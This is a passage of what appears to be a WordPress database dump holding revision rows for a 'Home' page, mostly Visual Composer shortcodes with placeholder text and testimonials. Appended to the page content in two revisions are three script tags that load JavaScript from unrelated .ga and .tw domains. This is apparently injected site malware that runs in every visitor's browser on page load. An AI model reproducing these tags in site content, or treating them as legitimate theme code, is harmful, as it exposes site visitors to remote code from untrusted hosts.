width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]</p>\n<h5></h5>\n<p>[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]<br />\n<h5>Best Price</h5>\n<p><span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]</p>\n<h5></h5>\n<p>[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]</p>\n<h5>True Power</h5>\n<p><span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span><br />\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]</p>\n<h5></h5>\n<p>[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]<br />\n<h5>Happy Service</h5>\n<p><span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"9%\" bottom_padding=\"9%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:83|text_align:center|color:%23ffffff|line_height:96px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We\'re changing the way people are connected by stories.<br />\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-autosave-v1','','','2018-01-30 01:03:10','2018-01-30 01:03:10','',5,'https://sandbox.futuremediatrix.com/dabinter/5-autosave-v1/',0,'revision','',0),(6671,1,'2018-01-29 16:02:26','2018-01-29 16:02:26','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1485280135262{margin-bottom: 10px !important;}\"]\r\n<h5>Reason One</h5>\r\n[/vc_column_text][vc_custom_heading text=\"Salient can elevate your business to new heights\" font_container=\"tag:h2|font_size:44|text_align:left|color:%23ffffff|line_height:50px\" use_theme_fonts=\"yes\"][vc_column_text css=\".vc_custom_1485279924521{margin-top: 30px !important;margin-bottom: 30px !important;}\"]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#ffffff\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"x_large_depth\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text css=\".vc_custom_1485280173184{margin-bottom: 10px !important;}\"]\r\n<h5><span style=\"color: #ff3a6f;\">Reason Two</span></h5>\r\n[/vc_column_text][vc_custom_heading text=\"The ultimate WordPress theme\" font_container=\"tag:h2|font_size:44|text_align:left|color:%23ff3a6f|line_height:50px\" use_theme_fonts=\"yes\"][vc_column_text css=\".vc_custom_1485279928611{margin-top: 30px !important;margin-bottom: 30px !important;}\"]<span style=\"color: #ff3a6f;\">I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</span>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ff3a6f\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-29 16:02:26','2018-01-29 16:02:26','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6672,1,'2018-01-29 16:37:03','2018-01-29 16:37:03','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. 